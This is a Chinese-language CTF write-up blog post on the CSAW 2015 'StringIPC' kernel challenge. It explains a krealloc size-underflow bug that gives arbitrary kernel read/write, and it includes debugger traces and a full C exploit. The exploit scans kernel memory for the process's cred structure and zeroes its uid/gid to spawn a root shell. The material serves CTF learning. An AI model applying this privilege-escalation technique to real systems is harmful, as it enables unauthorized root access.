kernel_pwn SringsIPC(P1)

2020-11-20

Kernel_pwn SringsIPC(P1)

从任意地址读写到提权的三种方法：
1.修改cred结构体
2.改写vdso映射函数+反弹shell
3.劫持prctl执行过程的hp->hook指针

这道题来自csaw-2015-ctf也是一道经典的内核题了，花了蛮久的时间去复现🤦

这题只给了程序的源代码main.c，需要我们自己搭建环境。我是懒狗，直接用了p4nda师傅的镜像和文件系统（十分感谢！😍）。
根据题目的名字猜测可能是实现了进程间通信过程中的的信箱机制（正好最近在做操作系统的IPC实验），但实际上是我想多了。

分析源码发现程序实现了对一片内存区域的申请，释放，读写，扩容，查寻操作。
漏洞点在扩容操作(realloc)函数中：

static int realloc_ipc_channel ( struct ipc_state *state, int id, size_t size, int grow )
{
    struct ipc_channel *channel;
    size_t new_size;
    char *new_data;

    channel = get_channel_by_id(state, id);
    if ( IS_ERR(channel) )
        return PTR_ERR(channel);

    if ( grow )
        new_size = channel->buf_size + size;
    else
        new_size = channel->buf_size - size;

    new_data = krealloc(channel->data, new_size + 1, GFP_KERNEL);
    if ( new_data == NULL )
        return -EINVAL;

    channel->data = new_data;
    channel->buf_size = new_size;

    ipc_channel_put(state, channel);

    return 0;
}

krealloc函数new_size是由channel->buf_size-size得到的，这两个值都可控，从而可以使得new_size+1==0。根据krealloc函数源码：

/**
 * krealloc - reallocate memory. The contents will remain unchanged.
 * @p: object to reallocate memory for.
 * @new_size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * The contents of the object pointed to are preserved up to the
 * lesser of the new and old sizes.  If @p is %NULL, krealloc()
 * behaves exactly like kmalloc().  If @new_size is 0 and @p is not a
 * %NULL pointer, the object pointed to is freed.
 *
 * Return: pointer to the allocated memory or %NULL in case of error
 */
void *krealloc(const void *p, size_t new_size, gfp_t flags)
{
	void *ret;

	if (unlikely(!new_size)) {
		kfree(p);
		return ZERO_SIZE_PTR;
	}

	ret = __do_krealloc(p, new_size, flags);
	if (ret && kasan_reset_tag(p) != kasan_reset_tag(ret))
		kfree(p);

	return ret;
}

如果传入的size为0，会返回ZERO_SIZE_PTR(#define ZERO_SIZE_PTR ((void *)16))，即为0x10(而不是0!!!)，此时有：

1 2	channel->buf_size = new_size == 0x10 channel->buf_size = new_size == 0xffffffffffffffff(size_t无符号)

如果将channel->index赋值为target_addr-0x10，根据read/write的功能可以绕过size的限制从而实现任意地址读写🙌。

利用方法

可以任意地址读写了，要如何提权呢？共学到了三种姿势

1.修改进程cred结构体

做过了babydriver那题就比较容易想到的要修改cred结构体了，但要怎么找到cred的地址呢？虽然我们已经可以任意地址读了，但要读哪里才能读到cred呢？头大。。。
看了raycp师傅的博客学到了寻找cred结构体的方法tql！。
首先线程由于要使用所属进程的资源，在其thread_info结构块中有一个struct task_struct类型的结构体，其内容为：

struct task_struct {
...
/* process credentials */
conststruct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */
conststruct cred __rcu *real_cred; /* objective and real subjective task
* credentials (COW) */
conststruct cred __rcu *cred;    /* effective (overridable) subjective task
* credentials (COW) */
char comm[TASK_COMM_LEN]; /* executable name excluding path
- access with[gs]et_task_comm (which lock
                       it with task_lock())
- initialized normally by setup_new_exec */
...
};

可以看到我们所关心的conststruct cred __rcu *cred; conststruct cred __rcu *real_cred;,还有一个重要的地方在于char comm[TASK_COMM_LEN];，这个字符数组保存了进程的名字，也为我们寻找cred提供了方法。
首先，task_struct所需的内存是动态分配得到的，我们知道通过kmem_cache_alloc_node函数申请的空间是在内核的动态分配区域。通过下面的内核映射空间可以确定爆破的范围在0xffff880000000000~0xffffc80000000000。

0xffffffffffffffff  ---+-----------+-----------------------------------------------+-------------+
                       |           |                                               |+++++++++++++|
    8M                 |           | unused hole                                   |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffffff7ff000  ---|-----------+------------| FIXADDR_TOP |--------------------|+++++++++++++|
    1M                 |           |                                               |+++++++++++++|
0xffffffffff600000  ---+-----------+------------| VSYSCALL_ADDR |------------------|+++++++++++++|
    548K               |           | vsyscalls                                     |+++++++++++++|
0xffffffffff577000  ---+-----------+------------| FIXADDR_START |------------------|+++++++++++++|
    5M                 |           | hole                                          |+++++++++++++|
0xffffffffff000000  ---+-----------+------------| MODULES_END |--------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    1520M              |           | module mapping space (MODULES_LEN)            |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffffa0000000  ---+-----------+------------| MODULES_VADDR |------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    512M               |           | kernel text mapping, from phys 0              |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffffffff80000000  ---+-----------+------------| __START_KERNEL_map |-------------|+++++++++++++|
    2G                 |           | hole                                          |+++++++++++++|
0xffffffff00000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    64G                |           | EFI region mapping space                      |+++++++++++++|
0xffffffef00000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    444G               |           | hole                                          |+++++++++++++|
0xffffff8000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    16T                |           | %esp fixup stacks                             |+++++++++++++|
0xffffff0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    3T                 |           | hole                                          |+++++++++++++|
0xfffffc0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    16T                |           | kasan shadow memory (16TB)                    |+++++++++++++|
0xffffec0000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffeb0000000000  ---+-----------+-----------------------------------------------| kernel space|
    1T                 |           | virtual memory map for all of struct pages    |+++++++++++++|
0xffffea0000000000  ---+-----------+------------| VMEMMAP_START |------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffe90000000000  ---+-----------+------------| VMALLOC_END   |------------------|+++++++++++++|
    32T                |           | vmalloc/ioremap (1 << VMALLOC_SIZE_TB)        |+++++++++++++|
0xffffc90000000000  ---+-----------+------------| VMALLOC_START |------------------|+++++++++++++|
    1T                 |           | hole                                          |+++++++++++++|
0xffffc80000000000  ---+-----------+-----------------------------------------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
    64T                |           | direct mapping of all phys. memory            |+++++++++++++|
                       |           | (1 << MAX_PHYSMEM_BITS)                       |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | -------------|+++++++++++++|
                       |           |                                               |+++++++++++++|
    8T                 |           | guard hole, reserved for hypervisor           |+++++++++++++|
                       |           |                                               |+++++++++++++|
0xffff800000000000 ----+-----------+-----------------------------------------------+-------------+
                       |-----------|                                               |-------------|
                       |-----------| hole caused by [48:63] sign extension         |-------------|
                       |-----------|                                               |-------------|
0x0000800000000000 ----+-----------+-----------------------------------------------+-------------+
    PAGE_SIZE          |           | guard page                                    |xxxxxxxxxxxxx|
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | ---------------|xxxxxxxxxxxxx|
                       |           |                                               |  user space |
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
    128T               |           | different per mm                              |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
                       |           |                                               |xxxxxxxxxxxxx|
0x0000000000000000 ----+-----------+-----------------------------------------------+-------------+

还有这里介绍一个关键的函数int prctl( int option,unsigned long arg2,unsigned long arg3,unsigned long arg4,unsigned long arg5 )，这是一个系统函数，是为进程制定而设计的。内核对应的处理函数为SYSCALL_DEFINE5()。
其中第一个参数option指定操作类型，如指定PR_SET_NAME，即设置进程名，之后的参数即为补充参数。
因此我们可以通过执行prctl(PR_SET_NAME,target)即可完成对进程名的设定。

因此利用方法就很明确了：
1.prctl函数设置进程明。
2.利用ioctl(fd,CSAW_SHRINK_CHANNEL,&shrink_channel)触发漏洞(channel->date=0x10 channel->buf_size=0xffffffffffffffff)。
3.利用任意地址读在0xffff880000000000~0xffffc80000000000范围内利用memmem()函数寻找进程名字符串char comm[TASK_COMM_LEN]。
4.找到cred地址后利用任意地址写修改uidgid为0

触发漏洞：
call krealloc时寄存器状态：

$rax   : 0xffffffffffffffff
$rbx   : 0xffff88001f9411e0  →  0x0000000100000002  →  0x0000000100000002
$rcx   : 0x0000000000000000  →  0x0000000000000000
$rdx   : 0x00000000024000c0  →  0x00000000024000c0
$rsp   : 0xffff88001f9e3e28  →  0xffff88001f9c5908  →  0x0000000000000000  →  0x0000000000000000
$rbp   : 0xffff88001f9e3e48  →  0xffff88001f9e3e98  →  0xffff88001f9e3f08  →  0xffff88001f9e3f48  →  0x00007fffde817950  →  0x0000000000401c70  →  0x2b54c73d8d4c5741  →  0x2b54c73d8d4c5741
$rsi   : 0x0000000000000000  →  0x0000000000000000    //new_size
$rdi   : 0xffff88001fa10a00  →  0x0000000000000000  →  0x0000000000000000
$rip   : 0xffffffffc00001a6  →  0xc08548c11a1355e8  →  0xc08548c11a1355e8
$r8    : 0x0000000000000101  →  0x0000000000000101
$r9    : 0x0000000000000000  →  0x0000000000000000
$r10   : 0x0000000000000000  →  0x0000000000000000
$r11   : 0x0000000000000000  →  0x0000000000000000
$r12   : 0xffffffffffffffff
$r13   : 0x0000000000000101  →  0x0000000000000101
$r14   : 0x0000000000000000  →  0x0000000000000000
$r15   : 0x00007fffde817890  →  0x00007fff00000001  →  0x00007fff00000001

返回值$rax : 0x0000000000000010 → 0x0000000000000010

赋值时：

→ 0xffffffffc00001b0 <realloc_ipc_channel.isra+80> mov    QWORD PTR [rbx+0x8], rax
   0xffffffffc00001b4 <realloc_ipc_channel.isra+84> mov    QWORD PTR [rbx+0x10], r12

$rax   : 0x0000000000000010  →  0x0000000000000010
$r12   : 0xffffffffffffffff

寻找cred:

   for(;addr < 0xffffc80000000000;addr += 0x1000){
       seek_channel.id = alloc_channel.id;
       seek_channel.index = addr-0x10;
       seek_channel.whence = SEEK_SET;
       ioctl(fd,CSAW_SEEK_CHANNEL,&seek_channel);
       read_channel.id = alloc_channel.id;
       read_channel.buf = buf;
       read_channel.count = 0x1000;
       ioctl(fd,CSAW_READ_CHANNEL,&read_channel);
       result = memmem(buf,0x1000,target,16);
       if (result)
	{
		cred = *(size_t *)(result - 0x8);
		real_cred = *(size_t *)(result - 0x10);
		if( (cred||0xff00000000000000) && (real_cred == cred)){
			//printf("[]%lx[]",result-(int)(buf));
			target_addr = addr + result-(int)(buf);
			printf("[+]found task_struct 0x%lx\n",target_addr);
			printf("[+]found cred 0x%lx\n",real_cred);
			break;
		}

	}
}

调试：

gef➤  x/40gx 0xffff8800002034c0-0x30     //task_struct
0xffff880000203490:	0xffff880019788968	0xffff880019788978
0xffff8800002034a0:	0xffff880019788978	0x0000000000000000
0xffff8800002034b0:	0xffff88001f9c2600	0xffff88001f9c2600  //cred_addr
0xffff8800002034c0:	0x3939393939396e61	0x00616c6539393939  //comm
0xffff8800002034d0:	0x0000000000000000	0x0000000000000000

gef➤  x/30gx 0xffff88001f9c2600    //cred
0xffff88001f9c2600:	0xffff88001f9c2900	0x000003e8000003e8
0xffff88001f9c2610:	0x000003e8000003e8	0x000003e8000003e8
0xffff88001f9c2620:	0x00000000000003e8	0x0000000000000000
0xffff88001f9c2630:	0x0000000000000000	0x0000000000000000
0xffff88001f9c2640:	0x0000003fffffffff	0x0000000000000000
0xffff88001f9c2650:	0x0000000000000000	0x0000000000000000

改写cred:

for(int i=0;i<44;i++){
        seek_channel.id = alloc_channel.id;
        seek_channel.index = cred-0x10+4+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd,CSAW_SEEK_CHANNEL,&seek_channel);
        root_cred[0]=0;
        write_channel.id = alloc_channel.id;
        write_channel.count= 1;
        write_channel.buf = (char*)root_cred;
        ioctl(fd,CSAW_WRITE_CHANNEL,&write_channel);
    }

完整exp:
```c
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};
int main(){
    struct alloc_channel_args alloc_channel;
    struct shrink_channel_args shrink_channel;
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;
    struct write_channel_args write_channel;
    struct close_channel_args close_channel;

    int fd = -1;
    u_int64_t addr = 0xffff880000000000;
    u_int64_t real_cred = 0;
    u_int64_t cred = 0;
    u_int64_t target_addr;
    u_int64_t result = 0;
    int root_cred[12];

    setvbuf(stdout,0,2,0);
    char *buf = malloc(0x1000);
    char target[16];
    strcpy(target,"an9999999999ela");
    prctl(PR_SET_NAME,target);
    fd = open("/dev/csaw",O_RDWR);
    if(fd<0){
        perror("open error");
    }
    alloc_channel.buf_size = 0x100;
    alloc_channel.id = -1;
    ioctl(fd,CSAW_ALLOC_CHANNEL,&alloc_channel);
    if(alloc_channel.id == -1){
        perror("alloc error");
    }
    printf("[+] you have got a channel %d\n",alloc_channel.id);
    shrink_channel.id = alloc_channel.id;
    shrink_channel.size = 0x101;
    ioctl(fd,CSAW_SHRINK_CHANNEL,&shrink_channel);   //channel->date=0x10 channel->buf_size=0xffffffffffffffff
    printf("[+] now we can read and write any mem\n");
    for(;addr < 0xffffc80000000000;addr += 0x1000){
        seek_channel.id = alloc_channel.id;
        seek_channel.index = addr-0x10;
        seek_channel.whence = SEEK_SET;
        ioctl(fd,CSAW_SEEK_CHANNEL,&seek_channel);
        read_channel.id = alloc_channel.id;
        read_channel.buf = buf;
        read_channel.count = 0x1000;
        ioctl(fd,CSAW_READ_CHANNEL,&read_channel);
        result = memmem(buf,0x1000,target,16);
        if (result)
		{
			cred = *(size_t *)(result - 0x8);
			real_cred = *(size_t *)(result - 0x10);
			if( (cred||0xff00000000000000) && (real_cred == cred)){
				//printf("[]%lx[]",result-(int)(buf));
				target_addr = addr + result-(int)(buf);
				printf("[+]found task_struct 0x%lx\n",target_addr);
				printf("[+]found cred 0x%lx\n",real_cred);
				break;
			}

		}
	}
	if(result == 0){
		puts("not found , try again ");
		exit(-1);
	}

    for(int i=0;i<44;i++){
        seek_channel.id = alloc_channel.id;
        seek_channel.index = cred-0x10+4+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd,CSAW_SEEK_CHANNEL,&seek_channel);
        root_cred[0]=0;
        write_channel.id = alloc_channel.id;
        write_channel.count= 1;
        write_channel.buf = (char*)root_cred;
        ioctl(fd,CSAW_WRITE_CHANNEL,&write_channel);
    }

    if(getuid() == 0){
        printf("[+] root now \n");
        system("/bin/sh");
    }

    return 0;
}

第一种的解法还算常规，第二三种解法就很骚了，看着p4nda和raycp两位大师傅的博客学的，师傅们tql!🤩,另外两种会单独再写两篇post。周一还有考试，赶紧去复习了😭。